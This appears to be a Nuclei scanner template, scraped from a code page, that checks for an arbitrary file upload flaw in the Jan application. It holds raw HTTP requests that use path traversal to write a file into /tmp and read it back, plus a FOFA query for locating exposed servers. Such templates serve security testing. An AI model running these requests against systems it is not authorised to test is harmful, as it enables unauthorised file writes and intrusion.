51 lines
1.6 KiB
YAML
51 lines
1.6 KiB
YAML
id: jan-file-upload
|
|
|
|
info:
|
|
name: Jan - Arbitrary File Upload
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
|
|
reference:
|
|
- https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
|
|
metadata:
|
|
fofa-query: icon_hash="-165268926"
|
|
max-request: 2
|
|
tags: jan,intrusive,file-upload
|
|
|
|
variables:
|
|
string: "{{to_lower(rand_base(5))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /v1/app/writeFileSync HTTP/1.1
|
|
Host: {{Hostname}}
|
|
contentType: application/json
|
|
Content-Type: text/plain;charset=UTF-8
|
|
Origin: {{RootURL}}
|
|
|
|
["/../../../../../tmp/{{string}}.txt","{{randstr}}"]
|
|
|
|
- |
|
|
POST /v1/app/readFileSync HTTP/1.1
|
|
Host: {{Hostname}}
|
|
contentType: application/json
|
|
Content-Type: text/plain;charset=UTF-8
|
|
Origin: {{RootURL}}
|
|
|
|
["file:/../../../../../tmp/{{string}}.txt","utf-8"]
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- '{{randstr}}'
|
|
|
|
- type: word
|
|
part: content_type_2
|
|
words:
|
|
- 'text/plain'
|
|
# digest: 4a0a00473045022100bab87139fb70667309d17f748b218ed04bd46430722ce1a85672fb48685efc1c0220027468b820d19a0c87d363387aecaaaf6a7448a21ca3584e58509cfbbe10f533:922c64590222798bb761d5b6d8e72950 |